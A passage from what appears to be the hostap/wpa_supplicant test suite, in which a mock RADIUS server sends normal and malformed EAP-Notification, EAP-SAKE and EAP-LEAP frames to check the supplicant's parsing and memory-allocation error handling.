ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP success")
dev[0].request("REMOVE_NETWORK all")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-NOTIFICATION"], timeout=10)
if ev is None:
raise Exception("Timeout on EAP notification")
if ev != "<3>CTRL-EVENT-EAP-NOTIFICATION C":
raise Exception("Unexpected notification contents: " + ev)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-NOTIFICATION"], timeout=10)
if ev is None:
raise Exception("Timeout on EAP notification")
if ev != "<3>CTRL-EVENT-EAP-NOTIFICATION D":
raise Exception("Unexpected notification contents: " + ev)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP success")
dev[0].request("REMOVE_NETWORK all")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-NOTIFICATION"], timeout=10)
if ev is None:
raise Exception("Timeout on EAP notification")
if ev != "<3>CTRL-EVENT-EAP-NOTIFICATION E":
raise Exception("Unexpected notification contents: " + ev)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-NOTIFICATION"], timeout=10)
if ev is None:
raise Exception("Timeout on EAP notification")
if ev != "<3>CTRL-EVENT-EAP-NOTIFICATION F":
raise Exception("Unexpected notification contents: " + ev)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP failure")
dev[0].request("REMOVE_NETWORK all")
finally:
stop_radius_server(srv)
def test_eap_proto_notification_errors(dev, apdev):
"""EAP Notification errors"""
def eap_handler(ctx, req):
logger.info("eap_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: MD5 challenge")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_MD5,
1, 0xaa, ord('n'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Notification/Request")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_NOTIFICATION,
ord('A'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: MD5 challenge")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_MD5,
1, 0xaa, ord('n'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Notification/Request")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_NOTIFICATION,
ord('A'))
return None
srv = start_radius_server(eap_handler)
try:
hapd = start_ap(apdev[0])
with alloc_fail(dev[0], 1, "eap_sm_processNotify"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="user", password="password",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with alloc_fail(dev[0], 1, "eap_msg_alloc;sm_EAP_NOTIFICATION_Enter"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="user", password="password",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
finally:
stop_radius_server(srv)
EAP_SAKE_VERSION = 2
EAP_SAKE_SUBTYPE_CHALLENGE = 1
EAP_SAKE_SUBTYPE_CONFIRM = 2
EAP_SAKE_SUBTYPE_AUTH_REJECT = 3
EAP_SAKE_SUBTYPE_IDENTITY = 4
EAP_SAKE_AT_RAND_S = 1
EAP_SAKE_AT_RAND_P = 2
EAP_SAKE_AT_MIC_S = 3
EAP_SAKE_AT_MIC_P = 4
EAP_SAKE_AT_SERVERID = 5
EAP_SAKE_AT_PEERID = 6
EAP_SAKE_AT_SPI_S = 7
EAP_SAKE_AT_SPI_P = 8
EAP_SAKE_AT_ANY_ID_REQ = 9
EAP_SAKE_AT_PERM_ID_REQ = 10
EAP_SAKE_AT_ENCR_DATA = 128
EAP_SAKE_AT_IV = 129
EAP_SAKE_AT_PADDING = 130
EAP_SAKE_AT_NEXT_TMPID = 131
EAP_SAKE_AT_MSK_LIFE = 132
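# EAP-SAKE subtype and attribute identifiers as defined in RFC 4763;
# attribute values 128 and above are skippable by a peer that does not
# recognize them.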
def test_eap_proto_sake(dev, apdev):
"""EAP-SAKE protocol tests"""
global eap_proto_sake_test_done
eap_proto_sake_test_done = False
def sake_challenge(ctx):
logger.info("Test: Challenge subtype")
return struct.pack(">BBHBBBBBBLLLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 18,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CHALLENGE,
EAP_SAKE_AT_RAND_S, 18, 0, 0, 0, 0)
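# SAKE attributes are TLVs whose 1-octet length includes the 2-octet
# attribute header, so AT_RAND_S carrying a 16-octet nonce is encoded
# with length 18; the four L fields above provide the 16 zero value
# octets.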
def sake_handler(ctx, req):
logger.info("sake_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] += 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'], 4 + 1,
EAP_TYPE_SAKE)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype without any attributes")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_IDENTITY)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype")
return struct.pack(">BBHBBBBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_IDENTITY,
EAP_SAKE_AT_ANY_ID_REQ, 4, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype (different session id)")
return struct.pack(">BBHBBBBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 1, EAP_SAKE_SUBTYPE_IDENTITY,
EAP_SAKE_AT_PERM_ID_REQ, 4, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype with too short attribute")
return struct.pack(">BBHBBBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 2,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_IDENTITY,
EAP_SAKE_AT_ANY_ID_REQ, 2)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype with truncated attribute")
return struct.pack(">BBHBBBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 2,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_IDENTITY,
EAP_SAKE_AT_ANY_ID_REQ, 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype with too short attribute header")
payload = struct.pack("B", EAP_SAKE_AT_ANY_ID_REQ)
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + len(payload),
EAP_TYPE_SAKE, EAP_SAKE_VERSION, 0,
EAP_SAKE_SUBTYPE_IDENTITY) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype with AT_IV but not AT_ENCR_DATA")
payload = struct.pack("BB", EAP_SAKE_AT_IV, 2)
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + len(payload),
EAP_TYPE_SAKE, EAP_SAKE_VERSION, 0,
EAP_SAKE_SUBTYPE_IDENTITY) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype with skippable and non-skippable unknown attribute")
payload = struct.pack("BBBB", 255, 2, 127, 2)
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + len(payload),
EAP_TYPE_SAKE, EAP_SAKE_VERSION, 0,
EAP_SAKE_SUBTYPE_IDENTITY) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype: AT_RAND_P with invalid payload length")
payload = struct.pack("BB", EAP_SAKE_AT_RAND_P, 2)
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + len(payload),
EAP_TYPE_SAKE, EAP_SAKE_VERSION, 0,
EAP_SAKE_SUBTYPE_IDENTITY) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype: AT_MIC_P with invalid payload length")
payload = struct.pack("BB", EAP_SAKE_AT_MIC_P, 2)
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + len(payload),
EAP_TYPE_SAKE, EAP_SAKE_VERSION, 0,
EAP_SAKE_SUBTYPE_IDENTITY) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype: AT_PERM_ID_REQ with invalid payload length")
payload = struct.pack("BBBBBBBBBBBBBB",
EAP_SAKE_AT_SPI_S, 2,
EAP_SAKE_AT_SPI_P, 2,
EAP_SAKE_AT_ENCR_DATA, 2,
EAP_SAKE_AT_NEXT_TMPID, 2,
EAP_SAKE_AT_PERM_ID_REQ, 4, 0, 0,
EAP_SAKE_AT_PERM_ID_REQ, 2)
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + len(payload),
EAP_TYPE_SAKE, EAP_SAKE_VERSION, 0,
EAP_SAKE_SUBTYPE_IDENTITY) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype: AT_PADDING")
payload = struct.pack("BBBBBB",
EAP_SAKE_AT_PADDING, 3, 0,
EAP_SAKE_AT_PADDING, 3, 1)
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + len(payload),
EAP_TYPE_SAKE, EAP_SAKE_VERSION, 0,
EAP_SAKE_SUBTYPE_IDENTITY) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype: AT_MSK_LIFE")
payload = struct.pack(">BBLBBH",
EAP_SAKE_AT_MSK_LIFE, 6, 0,
EAP_SAKE_AT_MSK_LIFE, 4, 0)
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + len(payload),
EAP_TYPE_SAKE, EAP_SAKE_VERSION, 0,
EAP_SAKE_SUBTYPE_IDENTITY) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype with invalid attribute length")
payload = struct.pack("BB", EAP_SAKE_AT_ANY_ID_REQ, 0)
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + len(payload),
EAP_TYPE_SAKE, EAP_SAKE_VERSION, 0,
EAP_SAKE_SUBTYPE_IDENTITY) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unknown subtype")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, 123)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge subtype without any attributes")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CHALLENGE)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge subtype with too short AT_RAND_S")
return struct.pack(">BBHBBBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 2,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CHALLENGE,
EAP_SAKE_AT_RAND_S, 2)
idx += 1
if ctx['num'] == idx:
return sake_challenge(ctx)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected Identity subtype")
return struct.pack(">BBHBBBBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_IDENTITY,
EAP_SAKE_AT_ANY_ID_REQ, 4, 0)
idx += 1
if ctx['num'] == idx:
return sake_challenge(ctx)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected Challenge subtype")
return struct.pack(">BBHBBBBBBLLLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 18,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CHALLENGE,
EAP_SAKE_AT_RAND_S, 18, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
return sake_challenge(ctx)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Confirm subtype without any attributes")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CONFIRM)
idx += 1
if ctx['num'] == idx:
return sake_challenge(ctx)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Confirm subtype with too short AT_MIC_S")
return struct.pack(">BBHBBBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 2,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CONFIRM,
EAP_SAKE_AT_MIC_S, 2)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected Confirm subtype")
return struct.pack(">BBHBBBBBBLLLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 18,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CONFIRM,
EAP_SAKE_AT_MIC_S, 18, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
return sake_challenge(ctx)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Confirm subtype with incorrect AT_MIC_S")
return struct.pack(">BBHBBBBBBLLLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 18,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CONFIRM,
EAP_SAKE_AT_MIC_S, 18, 0, 0, 0, 0)
global eap_proto_sake_test_done
if eap_proto_sake_test_done:
return sake_challenge(ctx)
logger.info("No more test responses available - test case completed")
eap_proto_sake_test_done = True
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
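# Once all canned responses above have been consumed, the handler sets
# the completion flag and answers with EAP-Failure; the connection loop
# below keeps re-running the exchange until that flag is raised.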
srv = start_radius_server(sake_handler)
try:
hapd = start_ap(apdev[0])
while not eap_proto_sake_test_done:
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SAKE", identity="sake user",
password_hex="0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.1)
dev[0].request("REMOVE_NETWORK all")
logger.info("Too short password")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SAKE", identity="sake user",
password_hex="0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcd",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.1)
finally:
stop_radius_server(srv)
def test_eap_proto_sake_errors(dev, apdev):
"""EAP-SAKE local error cases"""
check_eap_capa(dev[0], "SAKE")
params = hostapd.wpa2_eap_params(ssid="eap-test")
hapd = hostapd.add_ap(apdev[0], params)
for i in range(1, 3):
with alloc_fail(dev[0], i, "eap_sake_init"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SAKE", identity="sake user",
password_hex="0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef",
wait_connect=False)
ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
tests = [ ( 1, "eap_msg_alloc;eap_sake_build_msg;eap_sake_process_challenge" ),
( 1, "=eap_sake_process_challenge" ),
( 1, "eap_sake_compute_mic;eap_sake_process_challenge" ),
( 1, "eap_sake_build_msg;eap_sake_process_confirm" ),
( 1, "eap_sake_compute_mic;eap_sake_process_confirm" ),
( 2, "eap_sake_compute_mic;eap_sake_process_confirm" ),
( 1, "eap_sake_getKey" ),
( 1, "eap_sake_get_emsk" ),
( 1, "eap_sake_get_session_id" ) ]
for count, func in tests:
with alloc_fail(dev[0], count, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SAKE", identity="sake user@domain",
password_hex="0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef",
erp="1",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with fail_test(dev[0], 1, "os_get_random;eap_sake_process_challenge"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SAKE", identity="sake user",
password_hex="0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
def test_eap_proto_sake_errors2(dev, apdev):
"""EAP-SAKE protocol tests (2)"""
def sake_handler(ctx, req):
logger.info("sake_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] += 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype")
return struct.pack(">BBHBBBBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_IDENTITY,
EAP_SAKE_AT_ANY_ID_REQ, 4, 0)
srv = start_radius_server(sake_handler)
try:
hapd = start_ap(apdev[0])
with alloc_fail(dev[0], 1, "eap_msg_alloc;eap_sake_build_msg;eap_sake_process_identity"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SAKE", identity="sake user",
password_hex="0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
finally:
stop_radius_server(srv)
def test_eap_proto_leap(dev, apdev):
"""EAP-LEAP protocol tests"""
check_eap_capa(dev[0], "LEAP")
def leap_handler(ctx, req):
logger.info("leap_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
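# LEAP frames carry, after the EAP Type octet, a version octet (1), an
# unused octet and a count octet giving the challenge length (8 octets
# in requests, 24 octets in responses), followed by the challenge or
# response bytes; the malformed cases below truncate or corrupt these
# fields.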
if ctx['num'] == 1:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_LEAP)
if ctx['num'] == 2:
logger.info("Test: Unexpected version")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_LEAP,
0, 0, 0)
if ctx['num'] == 3:
logger.info("Test: Invalid challenge length")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_LEAP,
1, 0, 0)
if ctx['num'] == 4:
logger.info("Test: Truncated challenge")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_LEAP,
1, 0, 8)
if ctx['num'] == 5:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
if ctx['num'] == 6:
logger.info("Test: Missing payload in Response")
return struct.pack(">BBHB", EAP_CODE_RESPONSE, ctx['id'],
4 + 1,
EAP_TYPE_LEAP)
if ctx['num'] == 7:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
if ctx['num'] == 8:
logger.info("Test: Unexpected version in Response")
return struct.pack(">BBHBBBB", EAP_CODE_RESPONSE, ctx['id'],
4 + 1 + 3,
EAP_TYPE_LEAP,
0, 0, 8)
if ctx['num'] == 9:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
if ctx['num'] == 10:
logger.info("Test: Invalid challenge length in Response")
return struct.pack(">BBHBBBB", EAP_CODE_RESPONSE, ctx['id'],
4 + 1 + 3,
EAP_TYPE_LEAP,
1, 0, 0)
if ctx['num'] == 11:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
if ctx['num'] == 12:
logger.info("Test: Truncated challenge in Response")
return struct.pack(">BBHBBBB", EAP_CODE_RESPONSE, ctx['id'],
4 + 1 + 3,
EAP_TYPE_LEAP,
1, 0, 24)
if ctx['num'] == 13:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
if ctx['num'] == 14:
logger.info("Test: Invalid challange value in Response")
return struct.pack(">BBHBBBB6L", EAP_CODE_RESPONSE, ctx['id'],
4 + 1 + 3 + 24,
EAP_TYPE_LEAP,
1, 0, 24,
0, 0, 0, 0, 0, 0)
if ctx['num'] == 15:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
if ctx['num'] == 16:
logger.info("Test: Valid challange value in Response")
return struct.pack(">BBHBBBB24B", EAP_CODE_RESPONSE, ctx['id'],
4 + 1 + 3 + 24,
EAP_TYPE_LEAP,
1, 0, 24,
0x48, 0x4e, 0x46, 0xe3, 0x88, 0x49, 0x46, 0xbd,
0x28, 0x48, 0xf8, 0x53, 0x82, 0x50, 0x00, 0x04,
0x93, 0x50, 0x30, 0xd7, 0x25, 0xea, 0x5f, 0x66)
if ctx['num'] == 17:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
if ctx['num'] == 18:
logger.info("Test: Success")
return struct.pack(">BBHB", EAP_CODE_SUCCESS, ctx['id'],
4 + 1,
EAP_TYPE_LEAP)
# hostapd will drop the next frame in the sequence
if ctx['num'] == 19:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
if ctx['num'] == 20:
logger.info("Test: Failure")
return struct.pack(">BBHB", EAP_CODE_FAILURE, ctx['id'],
4 + 1,
EAP_TYPE_LEAP)
return None
srv = start_radius_server(leap_handler)
try:
hapd = start_ap(apdev[0])
for i in range(0, 12):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="LEAP", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.1)
if i == 10:
logger.info("Wait for additional roundtrip")
time.sleep(1)
dev[0].request("REMOVE_NETWORK all")
finally:
stop_radius_server(srv)
def test_eap_proto_leap_errors(dev, apdev):
"""EAP-LEAP protocol tests (error paths)"""
check_eap_capa(dev[0], "LEAP")
def leap_handler2(ctx, req):
logger.info("leap_handler2 - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid challange value in Response")
return struct.pack(">BBHBBBB24B", EAP_CODE_RESPONSE, ctx['id'],
4 + 1 + 3 + 24,
EAP_TYPE_LEAP,
1, 0, 24,
0x48, 0x4e, 0x46, 0xe3, 0x88, 0x49, 0x46, 0xbd,
0x28, 0x48, 0xf8, 0x53, 0x82, 0x50, 0x00, 0x04,
0x93, 0x50, 0x30, 0xd7, 0x25, 0xea, 0x5f, 0x66)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid challange value in Response")
return struct.pack(">BBHBBBB24B", EAP_CODE_RESPONSE, ctx['id'],
4 + 1 + 3 + 24,
EAP_TYPE_LEAP,
1, 0, 24,
0x48, 0x4e, 0x46, 0xe3, 0x88, 0x49, 0x46, 0xbd,
0x28, 0x48, 0xf8, 0x53, 0x82, 0x50, 0x00, 0x04,
0x93, 0x50, 0x30, 0xd7, 0x25, 0xea, 0x5f, 0x66)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid challange value in Response")
return struct.pack(">BBHBBBB24B", EAP_CODE_RESPONSE, ctx['id'],
4 + 1 + 3 + 24,
EAP_TYPE_LEAP,
1, 0, 24,
0x48, 0x4e, 0x46, 0xe3, 0x88, 0x49, 0x46, 0xbd,
0x28, 0x48, 0xf8, 0x53, 0x82, 0x50, 0x00, 0x04,
0x93, 0x50, 0x30, 0xd7, 0x25, 0xea, 0x5f, 0x66)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid challenge")
